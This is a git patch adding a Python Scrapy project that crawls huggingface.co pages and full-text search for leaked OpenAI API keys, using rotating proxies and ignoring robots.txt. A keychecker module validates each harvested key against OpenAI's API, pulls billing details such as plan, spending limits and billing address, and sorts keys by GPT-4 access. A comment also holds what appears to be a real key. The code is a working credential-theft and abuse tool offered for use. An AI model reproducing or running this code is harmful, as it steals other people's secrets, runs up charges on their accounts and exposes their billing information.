From 15759586e49b4838be6889f500f9f22cf21cd60d Mon Sep 17 00:00:00 2001 From: Cyberes Date: Sun, 23 Jul 2023 18:11:48 -0600 Subject: [PATCH] add files --- .gitignore | 3 +- huggingface/__init__.py | 0 huggingface/check-keys.py | 75 ++++++++ huggingface/crawl-search.py | 11 ++ huggingface/crawl-site.py | 10 ++ huggingface/huggingface/__init__.py | 0 huggingface/huggingface/items.py | 12 ++ huggingface/huggingface/middlewares.py | 128 ++++++++++++++ huggingface/huggingface/pipelines.py | 35 ++++ huggingface/huggingface/settings.py | 103 +++++++++++ huggingface/huggingface/spiders/__init__.py | 4 + .../huggingface/spiders/huggingface.py | 35 ++++ huggingface/huggingface/spiders/search.py | 31 ++++ huggingface/keychecker/__init__.py | 0 huggingface/keychecker/check.py | 165 ++++++++++++++++++ huggingface/scrapy.cfg | 11 ++ requirements.txt | 5 + 17 files changed, 627 insertions(+), 1 deletion(-) create mode 100644 huggingface/__init__.py create mode 100644 huggingface/check-keys.py create mode 100644 huggingface/crawl-search.py create mode 100644 huggingface/crawl-site.py create mode 100644 huggingface/huggingface/__init__.py create mode 100644 huggingface/huggingface/items.py create mode 100644 huggingface/huggingface/middlewares.py create mode 100644 huggingface/huggingface/pipelines.py create mode 100644 huggingface/huggingface/settings.py create mode 100644 huggingface/huggingface/spiders/__init__.py create mode 100644 huggingface/huggingface/spiders/huggingface.py create mode 100644 huggingface/huggingface/spiders/search.py create mode 100644 huggingface/keychecker/__init__.py create mode 100644 huggingface/keychecker/check.py create mode 100644 huggingface/scrapy.cfg create mode 100644 requirements.txt diff --git a/.gitignore b/.gitignore index 5d381cc..309e3a1 100644 --- a/.gitignore +++ b/.gitignore @@ -1,3 +1,5 @@ +.idea + # ---> Python # Byte-compiled / optimized / DLL files __pycache__/ @@ -159,4 +161,3 @@ cython_debug/ # and can be added to the global gitignore or merged into this file. For a more nuclear # option (not recommended) you can uncomment the following to ignore the entire idea folder. #.idea/ - diff --git a/huggingface/__init__.py b/huggingface/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/huggingface/check-keys.py b/huggingface/check-keys.py new file mode 100644 index 0000000..3ae0035 --- /dev/null +++ b/huggingface/check-keys.py @@ -0,0 +1,75 @@ +import argparse +import concurrent +from concurrent.futures import ThreadPoolExecutor +from pathlib import Path + +from keychecker.check import check_key + + +def process_key(key): + result = check_key(key) + if not len(result['errors']): + if result['has_gpt_4'] or result['has_only_turbo'] or result['has_gpt_4_32k']: + print(result) + return result + return None + + +def main(): + parser = argparse.ArgumentParser(description='Scrape data from chub.ai.') + parser.add_argument('input_file', help='Path to the file containing the keys.') + args = parser.parse_args() + + input_file = Path(args.input_file).resolve().absolute() + + if not input_file.exists(): + print('Input file does not exist:', input_file) + quit(1) + + with open(input_file) as f: + content = set(f.read().splitlines()) + + # content = ['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'] + + gpt_4 = set() + gpt_4_32k = set() + gpt_3 = set() + + with ThreadPoolExecutor(max_workers=50) as executor: + results = executor.map(process_key, content) + for result in results: + if result is not None: + if result['has_gpt_4']: + gpt_4.add(result['api_key']) + if result['has_gpt_4_32k']: + gpt_4_32k.add(result['api_key']) + if result['has_only_turbo']: + gpt_3.add(result['api_key']) + print('') + + print('GPT4 KEYS:') + if not len(gpt_4): + print('none') + else: + for key in gpt_4: + print(key) + print('') + + print('GPT4-32k KEYS:') + if not len(gpt_4_32k): + print('none') + else: + for key in gpt_4_32k: + print(key) + print('') + + print('GPT3 KEYS:') + if not len(gpt_3): + print('none') + else: + for key in gpt_3: + print(key) + + +if __name__ == "__main__": + main() diff --git a/huggingface/crawl-search.py b/huggingface/crawl-search.py new file mode 100644 index 0000000..27adc86 --- /dev/null +++ b/huggingface/crawl-search.py @@ -0,0 +1,11 @@ +import coloredlogs +from scrapy.crawler import CrawlerProcess +from scrapy.utils.project import get_project_settings + +from huggingface.spiders.search import HFSearchSpider + +if __name__ == "__main__": + process = CrawlerProcess(get_project_settings()) + + process.crawl(HFSearchSpider) + process.start() diff --git a/huggingface/crawl-site.py b/huggingface/crawl-site.py new file mode 100644 index 0000000..31529c2 --- /dev/null +++ b/huggingface/crawl-site.py @@ -0,0 +1,10 @@ +from scrapy.crawler import CrawlerProcess +from scrapy.utils.project import get_project_settings + +from huggingface.spiders.huggingface import HuggingfaceSpider + +if __name__ == "__main__": + process = CrawlerProcess(get_project_settings()) + + process.crawl(HuggingfaceSpider) + process.start() diff --git a/huggingface/huggingface/__init__.py b/huggingface/huggingface/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/huggingface/huggingface/items.py b/huggingface/huggingface/items.py new file mode 100644 index 0000000..c3ef36a --- /dev/null +++ b/huggingface/huggingface/items.py @@ -0,0 +1,12 @@ +# Define here the models for your scraped items +# +# See documentation in: +# https://docs.scrapy.org/en/latest/topics/items.html + +import scrapy + + +class HuggingfaceItem(scrapy.Item): + # define the fields for your item here like: + # name = scrapy.Field() + pass diff --git a/huggingface/huggingface/middlewares.py b/huggingface/huggingface/middlewares.py new file mode 100644 index 0000000..c130961 --- /dev/null +++ b/huggingface/huggingface/middlewares.py @@ -0,0 +1,128 @@ +# Define here the models for your spider middleware +# +# See documentation in: +# https://docs.scrapy.org/en/latest/topics/spider-middleware.html + + +# useful for handling different item types with a single interface + + +class HuggingfaceSpiderMiddleware: + # Not all methods need to be defined. If a method is not defined, + # scrapy acts as if the spider middleware does not modify the + # passed objects. + + @classmethod + def from_crawler(cls, crawler): + # This method is used by Scrapy to create your spiders. + s = cls() + crawler.signals.connect(s.spider_opened, signal=signals.spider_opened) + return s + + def process_spider_input(self, response, spider): + # Called for each response that goes through the spider + # middleware and into the spider. + + # Should return None or raise an exception. + return None + + def process_spider_output(self, response, result, spider): + # Called with the results returned from the Spider, after + # it has processed the response. + + # Must return an iterable of Request, or item objects. + for i in result: + yield i + + def process_spider_exception(self, response, exception, spider): + # Called when a spider or process_spider_input() method + # (from other spider middleware) raises an exception. + + # Should return either None or an iterable of Request or item objects. + pass + + def process_start_requests(self, start_requests, spider): + # Called with the start requests of the spider, and works + # similarly to the process_spider_output() method, except + # that it doesn’t have a response associated. + + # Must return only requests (not items). + for r in start_requests: + yield r + + def spider_opened(self, spider): + spider.logger.info("Spider opened: %s" % spider.name) + + +class HuggingfaceDownloaderMiddleware: + # Not all methods need to be defined. If a method is not defined, + # scrapy acts as if the downloader middleware does not modify the + # passed objects. + + @classmethod + def from_crawler(cls, crawler): + # This method is used by Scrapy to create your spiders. + s = cls() + crawler.signals.connect(s.spider_opened, signal=signals.spider_opened) + return s + + def process_request(self, request, spider): + # Called for each request that goes through the downloader + # middleware. + + # Must either: + # - return None: continue processing this request + # - or return a Response object + # - or return a Request object + # - or raise IgnoreRequest: process_exception() methods of + # installed downloader middleware will be called + return None + + def process_response(self, request, response, spider): + # Called with the response returned from the downloader. + + # Must either; + # - return a Response object + # - return a Request object + # - or raise IgnoreRequest + return response + + def process_exception(self, request, exception, spider): + # Called when a download handler or a process_request() + # (from other downloader middleware) raises an exception. + + # Must either: + # - return None: continue processing this exception + # - return a Response object: stops process_exception() chain + # - return a Request object: stops process_exception() chain + pass + + def spider_opened(self, spider): + spider.logger.info("Spider opened: %s" % spider.name) + + +from itertools import cycle + +from scrapy import signals +from scrapy.exceptions import NotConfigured + + +class RoundRobinProxyMiddleware: + def __init__(self, proxies): + if not proxies: + raise NotConfigured + self.proxies = cycle(proxies) + + @classmethod + def from_crawler(cls, crawler): + proxies = crawler.settings.getlist('PROXIES') + if not proxies: + raise NotConfigured + return cls(proxies) + + def process_request(self, request, spider): + request.meta['proxy'] = next(self.proxies) + + def process_exception(self, request, exception, spider): + request.meta['proxy'] = next(self.proxies) + return request diff --git a/huggingface/huggingface/pipelines.py b/huggingface/huggingface/pipelines.py new file mode 100644 index 0000000..78e0711 --- /dev/null +++ b/huggingface/huggingface/pipelines.py @@ -0,0 +1,35 @@ +from scrapy import Field, Item + + +# Define your item pipelines here +# +# Don't forget to add your pipeline to the ITEM_PIPELINES setting +# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html + + +# useful for handling different item types with a single interface + + +class HuggingfacePipeline: + def process_item(self, item, spider): + return item + + +class FoundItem(Item): + url = Field() + matches = Field() + + +class FilePipeline: + def open_spider(self, spider): + self.file = open(spider.filename or 'items.txt', 'w') + + def close_spider(self, spider): + self.file.close() + + def process_item(self, item, spider): + # line = f"URL: {item['url']}, Matches: {item['matches']}\n" + for m in item['matches']: + self.file.write(m + '\n') + self.file.flush() # Ensure the data is written to the disk immediately + return item diff --git a/huggingface/huggingface/settings.py b/huggingface/huggingface/settings.py new file mode 100644 index 0000000..0f63c92 --- /dev/null +++ b/huggingface/huggingface/settings.py @@ -0,0 +1,103 @@ +# Scrapy settings for huggingface project +# +# For simplicity, this file contains only settings considered important or +# commonly used. You can find more settings consulting the documentation: +# +# https://docs.scrapy.org/en/latest/topics/settings.html +# https://docs.scrapy.org/en/latest/topics/downloader-middleware.html +# https://docs.scrapy.org/en/latest/topics/spider-middleware.html + +BOT_NAME = "huggingface" + +SPIDER_MODULES = ["huggingface.spiders"] +NEWSPIDER_MODULE = "huggingface.spiders" + +# Crawl responsibly by identifying yourself (and your website) on the user-agent +USER_AGENT = "'Mozilla/5.0 (iPhone; CPU iPhone OS 16_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/115.0.5790.130 Mobile/15E148 Safari/604.1'" + +# Obey robots.txt rules +ROBOTSTXT_OBEY = False + +# Configure maximum concurrent requests performed by Scrapy (default: 16) +CONCURRENT_REQUESTS = 100 + +# Configure a delay for requests for the same website (default: 0) +# See https://docs.scrapy.org/en/latest/topics/settings.html#download-delay +# See also autothrottle settings and docs +DOWNLOAD_DELAY = 0 +# The download delay setting will honor only one of: +# CONCURRENT_REQUESTS_PER_DOMAIN = 16 +# CONCURRENT_REQUESTS_PER_IP = 16 + +# Disable cookies (enabled by default) +COOKIES_ENABLED = False + +# Disable Telnet Console (enabled by default) +# TELNETCONSOLE_ENABLED = False + +# Override the default request headers: +# DEFAULT_REQUEST_HEADERS = { +# "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", +# "Accept-Language": "en", +# } + +# Enable or disable spider middlewares +# See https://docs.scrapy.org/en/latest/topics/spider-middleware.html +# SPIDER_MIDDLEWARES = { +# "huggingface.middlewares.HuggingfaceSpiderMiddleware": 543, +# } + +# Enable or disable downloader middlewares +# See https://docs.scrapy.org/en/latest/topics/downloader-middleware.html +DOWNLOADER_MIDDLEWARES = { + "huggingface.middlewares.RoundRobinProxyMiddleware": 100, +} + +# Enable or disable extensions +# See https://docs.scrapy.org/en/latest/topics/extensions.html +# EXTENSIONS = { +# "scrapy.extensions.telnet.TelnetConsole": None, +# } + +# Configure item pipelines +# See https://docs.scrapy.org/en/latest/topics/item-pipeline.html +ITEM_PIPELINES = { + "huggingface.pipelines.FilePipeline": 300, +} + +# Enable and configure the AutoThrottle extension (disabled by default) +# See https://docs.scrapy.org/en/latest/topics/autothrottle.html +# AUTOTHROTTLE_ENABLED = True +# The initial download delay +# AUTOTHROTTLE_START_DELAY = 5 +# The maximum download delay to be set in case of high latencies +# AUTOTHROTTLE_MAX_DELAY = 60 +# The average number of requests Scrapy should be sending in parallel to +# each remote server +# AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0 +# Enable showing throttling stats for every response received: +# AUTOTHROTTLE_DEBUG = False + +# Enable and configure HTTP caching (disabled by default) +# See https://docs.scrapy.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings +# HTTPCACHE_ENABLED = True +# HTTPCACHE_EXPIRATION_SECS = 0 +# HTTPCACHE_DIR = "httpcache" +# HTTPCACHE_IGNORE_HTTP_CODES = [] +# HTTPCACHE_STORAGE = "scrapy.extensions.httpcache.FilesystemCacheStorage" + +# Set settings whose default value is deprecated to a future-proof value +REQUEST_FINGERPRINTER_IMPLEMENTATION = "2.7" +TWISTED_REACTOR = "twisted.internet.asyncioreactor.AsyncioSelectorReactor" +FEED_EXPORT_ENCODING = "utf-8" + +PROXIES = [ + "http://172.0.4.7:3128", + "http://172.0.4.8:3128", + "http://172.0.4.10:3128", + "http://172.0.4.12:3128", +] + +LOG_LEVEL = 'CRITICAL' + +HTTPCACHE_ENABLED = True diff --git a/huggingface/huggingface/spiders/__init__.py b/huggingface/huggingface/spiders/__init__.py new file mode 100644 index 0000000..ebd689a --- /dev/null +++ b/huggingface/huggingface/spiders/__init__.py @@ -0,0 +1,4 @@ +# This package will contain the spiders of your Scrapy project +# +# Please refer to the documentation for information on how to create and manage +# your spiders. diff --git a/huggingface/huggingface/spiders/huggingface.py b/huggingface/huggingface/spiders/huggingface.py new file mode 100644 index 0000000..ff36b84 --- /dev/null +++ b/huggingface/huggingface/spiders/huggingface.py @@ -0,0 +1,35 @@ +import logging +import re +import time + +import coloredlogs +from scrapy.linkextractors import LinkExtractor +from scrapy.spiders import CrawlSpider, Rule + +from ..pipelines import FoundItem + + +class HuggingfaceSpider(CrawlSpider): + name = "huggingface" + allowed_domains = ["huggingface.co"] + start_urls = ["https://huggingface.co/"] + logger = logging.getLogger('HFSearchSpider') + logger.setLevel(logging.DEBUG) + coloredlogs.install(logger=logger, level=logging.DEBUG) + + rules = ( + Rule(LinkExtractor(allow_domains=allowed_domains), callback='parse_start_url', follow=True), + ) + + def __init__(self, *args, **kwargs): + super(HuggingfaceSpider, self).__init__(*args, **kwargs) + self.regex = re.compile(r'sk-[a-zA-Z0-9]{47}') + self.filename = f'found-keys-site-{int(time.time())}.txt' + + def parse_start_url(self, response): + self.logger.debug(f"Status: {response.status}, URL: {response.url}") + text = response.text + matches = self.regex.findall(text) + if matches: + self.logger.error(f"{matches}") + return FoundItem(url=response.url, matches=matches) diff --git a/huggingface/huggingface/spiders/search.py b/huggingface/huggingface/spiders/search.py new file mode 100644 index 0000000..70b7286 --- /dev/null +++ b/huggingface/huggingface/spiders/search.py @@ -0,0 +1,31 @@ +import logging +import re +import time + +import coloredlogs +import scrapy + +from ..pipelines import FoundItem + + +class HFSearchSpider(scrapy.Spider): + name = "huggingface_search" + allowed_domains = ["huggingface.co"] + start_urls = ['https://huggingface.co/search/full-text?q=sk-{}&limit=100&skip={}'.format(i, j * 100) for i in ['a', 'h', 'm', 'q'] for j in range(10)] + logger = logging.getLogger('HFSearchSpider') + logger.setLevel(logging.DEBUG) + coloredlogs.install(logger=logger, level=logging.DEBUG) + + def __init__(self, *args, **kwargs): + super(HFSearchSpider, self).__init__(*args, **kwargs) + self.filename = f'found-keys-{int(time.time())}.txt' + + def parse(self, response): + self.logger.debug(f"Status: {response.status}, URL: {response.url}") + keys = re.findall(r'(sk-.)([a-zA-Z0-9]{47})', response.text) + found_keys = set() + for key in keys: + found_keys.add(''.join(key)) + if len(found_keys): + self.logger.error(f"{found_keys}") + yield FoundItem(url=response.url, matches=found_keys) diff --git a/huggingface/keychecker/__init__.py b/huggingface/keychecker/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/huggingface/keychecker/check.py b/huggingface/keychecker/check.py new file mode 100644 index 0000000..5653fed --- /dev/null +++ b/huggingface/keychecker/check.py @@ -0,0 +1,165 @@ +# -*- coding: utf-8 -*- +import logging +import threading +import time +from datetime import datetime + +import openai +import requests + +desired_models = ["gpt-3.5-turbo", "gpt-4", "gpt-4-32k"] + + +def list_models(api_key): + openai.api_key = api_key + models = openai.Model.list() + return [model.id for model in models['data']] + + +def filter_models(models): + return [model for model in models if model in desired_models] + + +def get_limits(api_key): + headers = { + "authorization": f"Bearer {api_key}", + "Referer": "https://platform.openai.com/account/usage", + } + response = requests.get("https://api.openai.com/dashboard/billing/subscription", headers=headers) + + if response.status_code == 200: + return True, response.json() + else: + return False, response.text + + +key_test_lock = threading.Lock() + + +def try_complete(api_key): + with key_test_lock: + openai.api_key = api_key + response = openai.ChatCompletion.create( + model="gpt-3.5-turbo", + max_tokens=1, + messages=[{'role': 'user', 'content': ''}] + ) + + +# def test_key(api_key): +# # with key_test_lock: # not 100% sure it's thread-safe +# openai.api_key = api_key +# try: +# response = openai.Completion.create( +# engine="gpt-3.5-turbo", +# prompt='Hello there!', +# max_tokens=100 +# ) +# print(response.choices[0].text.strip()) +# return True +# except Exception as e: +# print(f"An error occurred: {e}") +# return False + + +def check_key(api_key, retry_count=3): + result = f"{api_key}\n" + has_gpt_4_32k = False + model_ids = [] + errors = [] + + usage_and_limits_success, usage_and_limits = get_limits(api_key) + if not usage_and_limits_success: + return { + 'key': api_key, + 'has_gpt_4': None, + 'has_gpt_4_32k': None, + 'has_only_turbo': None, + 'org_id': None, + 'soft_limit_usd': None, + 'hard_limit_usd': None, + 'access_until': None, # .strftime('%Y-%m-%d %H:%M:%S'), + 'plan': None, + 'plan_id': None, + 'address': None, + 'errors': usage_and_limits + } + + if usage_and_limits is None: + logging.error(f"Failed to get usage and limits for API key {api_key}") + return + plan = usage_and_limits.get('plan') + if plan is None: + plan_title = '' + plan_id = '' + else: + plan_title = plan.get('title', '') + plan_id = plan.get('id', '') + access_until = datetime.fromtimestamp(usage_and_limits['access_until']) + org_id = usage_and_limits.get('account_name', '') + billing_address = usage_and_limits.get('billing_address', {}) + if billing_address is not None: + billing_country = billing_address.get('country', '') + billing_city = billing_address.get('city', '') + else: + billing_country = '' + billing_city = '' + is_canceled = usage_and_limits.get('canceled', False) + canceled_at_raw = usage_and_limits.get('canceled_at', '') + canceled_at = datetime.fromtimestamp(canceled_at_raw) if canceled_at_raw is not None else None + + models = list_models(api_key) + filtered_models = filter_models(models) + + if filtered_models: + for model_id in filtered_models: + result += f" - {model_id}\n" + model_ids.append(model_id) + else: + result += " No desired models available.\n" + + has_gpt_4 = "gpt-4" in model_ids + has_gpt_4_32k = "gpt-4-32k" in model_ids + has_only_turbo = "gpt-3.5-turbo" in model_ids and not has_gpt_4 + + try: + for attempts in range(retry_count): + try: + try_complete(api_key) + break + except Exception as e: + error_message = str(e) + if "The server is overloaded or not ready yet" in error_message: + logging.info(f'Error encountered when generating a completion on attempt {attempts + 1}: {error_message}. Retrying...') + time.sleep(5) + continue + else: + raise e + except Exception as e: + error_message = str(e) + if "You exceeded your current quota" in error_message and is_canceled: + errors.append('You exceeded your current quota') + elif "You exceeded your current quota" in error_message and not is_canceled: + errors.append('This key has exceeded its current quota') + elif "Your account is not active" in error_message: + errors.append('Error: Your account is not active, please check your billing details on our website.') + else: + errors.append(error_message) + + # api_key_works = test_key(api_key) + + return { + 'api_key': api_key, + # 'api_key_works': api_key_works, + 'has_gpt_4': has_gpt_4, + 'has_gpt_4_32k': has_gpt_4_32k, + 'has_only_turbo': has_only_turbo, + 'org_id': org_id, + 'soft_limit_usd': usage_and_limits['soft_limit_usd'], + 'hard_limit_usd': float(usage_and_limits['hard_limit_usd']), + 'access_until': access_until, # .strftime('%Y-%m-%d %H:%M:%S'), + 'plan': plan_title, + 'plan_id': plan_id, + 'address': f'{billing_country}, {billing_city}', + 'errors': errors + } diff --git a/huggingface/scrapy.cfg b/huggingface/scrapy.cfg new file mode 100644 index 0000000..c1762b0 --- /dev/null +++ b/huggingface/scrapy.cfg @@ -0,0 +1,11 @@ +# Automatically created by: scrapy startproject +# +# For more information about the [deploy] section see: +# https://scrapyd.readthedocs.io/en/latest/deploy.html + +[settings] +default = huggingface.settings + +[deploy] +#url = http://localhost:6800/ +project = huggingface diff --git a/requirements.txt b/requirements.txt new file mode 100644 index 0000000..856695f --- /dev/null +++ b/requirements.txt @@ -0,0 +1,5 @@ +beautifulsoup4 +requests +scrapy +coloredlogs +openai \ No newline at end of file